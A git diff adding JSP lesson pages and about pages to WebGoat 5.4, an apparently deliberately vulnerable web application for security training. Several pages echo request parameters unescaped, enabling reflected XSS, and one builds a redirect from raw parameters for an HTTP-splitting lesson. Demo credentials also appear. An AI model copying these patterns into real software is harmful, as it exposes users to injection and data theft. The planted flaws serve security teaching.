+ Employee employee = (Employee) session.getAttribute("DBSQLInjection." + DBSQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
+// int myUserId = getIntSessionAttribute(webSession, "DBSQLInjection." + DBSQLInjection.USER_ID);
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%>
+
+
+
+ First Name:
+
+
+ <%=employee.getFirstName()%>
+
+
+ Last Name:
+
+
+ <%=employee.getLastName()%>
+
+
+ Street:
+
+
+ <%=employee.getAddress1()%>
+
+
+ City/State:
+
+ <%=employee.getAddress2()%>
+
+
+ Phone:
+
+
+ <%=employee.getPhoneNumber()%>
+
+
+ Start Date:
+
+
+ <%=employee.getStartDate()%>
+
+
+ SSN:
+
+
+ <%=employee.getSsn()%>
+
+
+ Salary:
+
+
+ <%=employee.getSalary()%>
+
+
+ Credit Card:
+
+
+ <%=employee.getCcn()%>
+
+
+ Credit Card Limit:
+
+
+ <%=employee.getCcnLimit()%>
+
+
+ Comments:
+
+
+ <%=employee.getPersonalDescription()%>
+
+
+ Manager:
+
+
+ <%=employee.getManager()%>
+
+
+ Disciplinary Explanation:
+
+
+ <%=employee.getDisciplinaryActionNotes()%>
+
+
+ Disciplinary Action Dates:
+
+
+ <%=employee.getDisciplinaryActionDate()%>
+
+
+
HTTP Splitting
+
+
+<% response.sendRedirect(request.getContextPath() + "/attack?" +
+ "Screen=" + request.getParameter("Screen") +
+ "&menu=" + request.getParameter("menu") +
+ "&fromRedirect=yes&language=" + request.getParameter("language"));
+%>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp
new file mode 100755
index 000000000..d486230e7
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp
@@ -0,0 +1,137 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ Employee employee = (Employee) session.getAttribute("GoatHillsFinancial.Employee");
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - Edit Profile Page
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css
new file mode 100755
index 000000000..61e93f63c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/GoatHillsFinancial/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/GoatHillsFinancial/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
new file mode 100755
index 000000000..90dbef989
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
@@ -0,0 +1,30 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*"
+ errorPage="" %>
+<%@page import="org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;"%>
+
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+System.out.println("WebSession is " + webSession);
+GoatHillsFinancial currentLesson = (GoatHillsFinancial) webSession.getCurrentLesson();
+System.out.println("CurrentLesson = " + currentLesson);
+%>
+
+
+
+ <%
+ String subViewPage = currentLesson.getPage(webSession);
+ System.out.println("SubViewPage is " + subViewPage);
+ if (subViewPage != null)
+ {
+ //System.out.println("Including sub view page: " + subViewPage);
+ %>
+
+
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
+ Select from the list below
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp
new file mode 100755
index 000000000..9e13040cd
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
+ errorPage="" %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ %>
+
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ String searchedName = request.getParameter(GoatHillsFinancial.SEARCHNAME);
+ if (searchedName != null)
+ {
+ %>
+ Employee <%=searchedName%> not found.
+ <%
+ }
+ %>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp
new file mode 100755
index 000000000..a03d60a07
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp
@@ -0,0 +1,157 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
+ errorPage="" %>
+<%
+ Employee employee = (Employee) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY);
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+// int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - View Profile Page
+
+
+
+ First Name:
+
+
+ <%=employee.getFirstName()%>
+
+
+ Last Name:
+
+
+ <%=employee.getLastName()%>
+
+
+ Street:
+
+
+ <%=employee.getAddress1()%>
+
+
+ City/State:
+
+ <%=employee.getAddress2()%>
+
+
+ Phone:
+
+
+ <%=employee.getPhoneNumber()%>
+
+
+ Start Date:
+
+
+ <%=employee.getStartDate()%>
+
+
+ SSN:
+
+
+ <%=employee.getSsn()%>
+
+
+ Salary:
+
+
+ <%=employee.getSalary()%>
+
+
+ Credit Card:
+
+
+ <%=employee.getCcn()%>
+
+
+ Credit Card Limit:
+
+
+ <%=employee.getCcnLimit()%>
+
+
+ Comments:
+
+
+ <%=employee.getPersonalDescription()%>
+
+
+
+ Disciplinary Explanation:
+
+
+ Disc. Dates:
+
+
+ <%=employee.getDisciplinaryActionDate()%>
+
+
+
+ <%=employee.getDisciplinaryActionNotes()%>
+
+
+
+
+ Manager:
+
+
+ <%=employee.getManager()%>
+
+
+
+
Welcome Back <%=webSession.getUserNameInLesson()%> - Edit Profile Page
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp b/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
new file mode 100644
index 000000000..16e976851
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
@@ -0,0 +1,57 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ int myUserId = webSession.getUserIdInLesson();
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
+ Select from the list below
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp b/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp
new file mode 100644
index 000000000..6e97a55e5
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
+ errorPage="" %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ %>
+
+
+
+
+
+ <%
+ String subViewPage = currentLesson.getPage(webSession);
+ if (subViewPage != null)
+ {
+ //System.out.println("Including sub view page: " + subViewPage);
+ %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ String searchedName = request.getParameter(RoleBasedAccessControl.SEARCHNAME);
+ if (searchedName != null)
+ {
+ %>
+ Employee <%=searchedName%> not found.
+ <%
+ }
+ %>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp
new file mode 100644
index 000000000..896eec8f3
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp
@@ -0,0 +1,157 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
+ errorPage="" %>
+<%
+ Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY);
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+// int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - View Profile Page
+
+
+
+ First Name:
+
+
+ <%=employee.getFirstName()%>
+
+
+ Last Name:
+
+
+ <%=employee.getLastName()%>
+
+
+ Street:
+
+
+ <%=employee.getAddress1()%>
+
+
+ City/State:
+
+ <%=employee.getAddress2()%>
+
+
+ Phone:
+
+
+ <%=employee.getPhoneNumber()%>
+
+
+ Start Date:
+
+
+ <%=employee.getStartDate()%>
+
+
+ SSN:
+
+
+ <%=employee.getSsn()%>
+
+
+ Salary:
+
+
+ <%=employee.getSalary()%>
+
+
+ Credit Card:
+
+
+ <%=employee.getCcn()%>
+
+
+ Credit Card Limit:
+
+
+ <%=employee.getCcnLimit()%>
+
+
+ Comments:
+
+
+ <%=employee.getPersonalDescription()%>
+
+
+
+ Disciplinary Explanation:
+
+
+ Disc. Dates:
+
+
+ <%=employee.getDisciplinaryActionDate()%>
+
+
+
+ <%=employee.getDisciplinaryActionNotes()%>
+
+
+
+
+ Manager:
+
+
+ <%=employee.getManager()%>
+
+
+
+
Welcome Back <%=webSession.getUserNameInLesson()%>
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/SQLInjection/ListStaff.jsp b/webgoat-5.4/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
new file mode 100644
index 000000000..5b6256e71
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
@@ -0,0 +1,57 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ int myUserId = webSession.getUserIdInLesson();
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
+ Select from the list below
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/SQLInjection/Login.jsp b/webgoat-5.4/src/main/webapp/lessons/SQLInjection/Login.jsp
new file mode 100644
index 000000000..a88d694db
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/SQLInjection/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
+ errorPage="" %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ %>
+
+
+
+
+
+ <%
+ String subViewPage = currentLesson.getPage(webSession);
+ if (subViewPage != null)
+ {
+ //System.out.println("Including sub view page: " + subViewPage);
+ %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ String searchedName = request.getParameter(SQLInjection.SEARCHNAME);
+ if (searchedName != null)
+ {
+ %>
+ Employee <%=searchedName%> not found.
+ <%
+ }
+ %>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp
new file mode 100644
index 000000000..a05a0bc39
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp
@@ -0,0 +1,154 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ Employee employee = (Employee) session.getAttribute("SQLInjection." + SQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
+// int myUserId = getIntSessionAttribute(webSession, "SQLInjection." + SQLInjection.USER_ID);
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%>
+
+
+
+ First Name:
+
+
+ <%=employee.getFirstName()%>
+
+
+ Last Name:
+
+
+ <%=employee.getLastName()%>
+
+
+ Street:
+
+
+ <%=employee.getAddress1()%>
+
+
+ City/State:
+
+ <%=employee.getAddress2()%>
+
+
+ Phone:
+
+
+ <%=employee.getPhoneNumber()%>
+
+
+ Start Date:
+
+
+ <%=employee.getStartDate()%>
+
+
+ SSN:
+
+
+ <%=employee.getSsn()%>
+
+
+ Salary:
+
+
+ <%=employee.getSalary()%>
+
+
+ Credit Card:
+
+
+ <%=employee.getCcn()%>
+
+
+ Credit Card Limit:
+
+
+ <%=employee.getCcnLimit()%>
+
+
+ Comments:
+
+
+ <%=employee.getPersonalDescription()%>
+
+
+ Manager:
+
+
+ <%=employee.getManager()%>
+
+
+ Disciplinary Explanation:
+
+
+ <%=employee.getDisciplinaryActionNotes()%>
+
+
+ Disciplinary Action Dates:
+
+
+ <%=employee.getDisciplinaryActionDate()%>
+
+
+
+
+ Mike
+ 11123
+ test123
+ 468100
+
+
+ John
+ 63458
+ myownpass
+ 559833
+
+
+ Sarah
+ 23363
+ secret
+ 84000
+
+
diff --git a/webgoat-5.4/src/main/webapp/main.jsp b/webgoat-5.4/src/main/webapp/main.jsp
new file mode 100644
index 000000000..adb56330d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/main.jsp
@@ -0,0 +1,300 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.Category, org.owasp.webgoat.lessons.AbstractLesson, org.owasp.webgoat.util.*, java.util.*"
+ errorPage="" %>
+<%
+Course course = ((Course)session.getAttribute("course"));
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+AbstractLesson currentLesson = webSession.getCurrentLesson();
+%>
+
+
+<%@page import="org.owasp.webgoat.lessons.RandomLessonAdapter"%>
+
+
+<%=currentLesson.getTitle()%>
+
+ <%
+ int topCord = 140;
+ int zIndex = 105;
+
+ Iterator iter2 = categories.iterator();
+ while(iter2.hasNext())
+ {
+ Category category = (Category)iter2.next();
+ %>
+
+ <%
+ topCord=topCord + 30;
+ zIndex=zIndex + 1;
+ }
+
+ int topSubMenu = 72;
+
+ Iterator iter3 = categories.iterator();
+ while(iter3.hasNext())
+ {
+ Category category = (Category)iter3.next();
+ List lessons = webSession.getLessons(category);
+ Iterator iter4 = lessons.iterator();
+ %>
+ <%
+ }%>
+
+
+
+ <% if (currentLesson.getAvailableLanguages().size() != 0 )
+ {
+ %>
+
+ <%
+ } else {
+ %>
+ Internationalization is not available for this lesson
+ <%
+ }
+ %>
+
+
+
+
+
<%=currentLesson.getTitle()%>
+
+
+
+
+ <%
+ if (currentLesson != null)
+ {
+ %>
+
+ <%
+ }
+ %>
+
+
+ <%
+ if (webSession.getHint() != null)
+ {
+ printHint = "
" + webSession.getHint() + "
";
+ out.println(printHint);
+ }
+
+ if (webSession.getParams() != null)
+ {
+ Iterator i = webSession.getParams().iterator();
+ while (i.hasNext())
+ {
+ Parameter p = (Parameter) i.next();
+ printParameters = "
" + p.getName() + "=" + p.getValue() + "
";
+ out.println(printParameters);
+ }
+ }
+
+ if (webSession.getCookies() != null)
+ {
+ Iterator i = webSession.getCookies().iterator();
+ while (i.hasNext())
+ {
+ Cookie c = (Cookie) i.next();
+ printCookies = "
" + c.getName() + "
" + c.getValue() + "
";
+ out.println(printCookies);
+ }
+ }%>
+
+
+ <%
+ AbstractLesson lesson = webSession.getCurrentLesson();
+ if (lesson instanceof RandomLessonAdapter) {
+ RandomLessonAdapter rla = (RandomLessonAdapter) lesson;
+ %>
+
Stage <%= rla.getLessonTracker(webSession).getStageNumber(rla.getStage(webSession)) + 1 %>
+ <%
+ }
+ %>
+ <%=webSession.getInstructions()%>
+
<%=webSession.getMessage()%>
+
+ <%
+ if (currentLesson.getTemplatePage(webSession) != null)
+ {
+ //System.out.println("Main.jsp - current lesson: " + currentLesson.getName() );
+ //System.out.println(" - template Page: " + currentLesson.getTemplatePage(webSession));
+ %>
+
+ <%
+ }
+ else
+ {
+ %>
+
<%=currentLesson.getContent()%>
+ <%
+ }
+ %>
+
+ <% out.println(currentLesson.getCredits());%>
+
+
+
+
+
+
WebGoat V5.4
+
+
+
+
Thank you for taking the time to improve WebGoat!
+
The lesson you were on was: <%=webSession.getCurrentLesson().getName()%>
+
There are several ways to report a bug, fix a bug, or get help.
+
+
To report a bug:
+
+ File a WebGoat defect using Google Code
+ WebGoat Issues . Please be as specific as possible. If you have a
+ recommended solution for a bug, include the solution in the bug report.
+
+
To get help:
+
+ Look in the FAQ ,
+ the most common problems are in the FAQ. The FAQ also allows user comments,
+ but it is not monitored like the WebGoat mailing list.
+ Send an email to the WebGoat
+ mail list . The WebGoat mail list is the preferred method to ask for
+ help. It is likely that someone has already experienced the issue you
+ are seeing. In order to post to the list you must be subscribed
+ to the WebGoat Mail List.
+ Send an email to Bruce
+ Mayhew
+
+
To fix a bug, typo, or enhance WebGoat:
+
+ Send an email to Bruce
+ Mayhew . This will start the discussion of getting you added to the WebGoat
+ Contributers List . Once you become a WebGoat contributor, you can fix
+ as many bugs/lessons as you desire.
+
+
+
+
+
+
Untitled Document
+
+ <%
+ String source = webSession.getSource();
+ if (source != null)
+ {
+ String printSource = "
" + source + "
";
+ out.println(printSource);
+ }
+ %>
+
WebGoat V5.4
+
+
+
+
Thank you for using WebGoat! This program is a demonstration of common web application flaws.
+The exercises are intended to provide hands on experience with
+application penetration testing techniques.
+
The WebGoat project is led
+by Bruce Mayhew. Please send all comments to Bruce at <%=webSession.getWebgoatContext().getFeedbackAddress()%>.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ WebGoat Authors
+
+
+
+
+
+ Bruce Mayhew
+
+
+
+
+
+ Jeff Williams
+
+
+
+
+
+
+
+
+
+
+
+
+ David Anderson
+ Laurence Casey (Graphics)
+ Rogan Dawes
+ Bruce Mayhew
+
+
+ Sherif Koussa
+ Yiannis Pavlosoglou
+
+
+
+
+
+
+ Special Thanks
+ for V5.4
+
+
+ Documentation
+ Contributers
+
+
+
+
+ Brian Ciomei (Multitude of bug fixes)
+ To all who have sent comments
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
WARNING
+
WebGoat V5.4
+
+
+
+
Thank you for using WebGoat! This program is a demonstration of common web application flaws.
+The exercises are intended to provide hands on experience with
+application penetration testing techniques.
+
The WebGoat project is led
+by Bruce Mayhew. Please send all comments to Bruce at <%=webSession.getWebgoatContext().getFeedbackAddress()%>.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ WebGoat Authors
+
+
+
+
+
+ Bruce Mayhew
+
+
+
+
+
+ Jeff Williams
+
+
+
+
+
+
+
+
+
+
+
+
+ David Anderson
+ Laurence Casey (Graphics)
+ Rogan Dawes
+ Bruce Mayhew
+
+
+ Sherif Koussa
+ Yiannis Pavlosoglou
+
+
+
+
+
+
+ Special Thanks
+ for V5.4
+
+
+ Documentation
+ Contributers
+
+
+
+
+ Brian Ciomei (Multitude of bug fixes)
+ To all who have sent comments
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
WARNING
+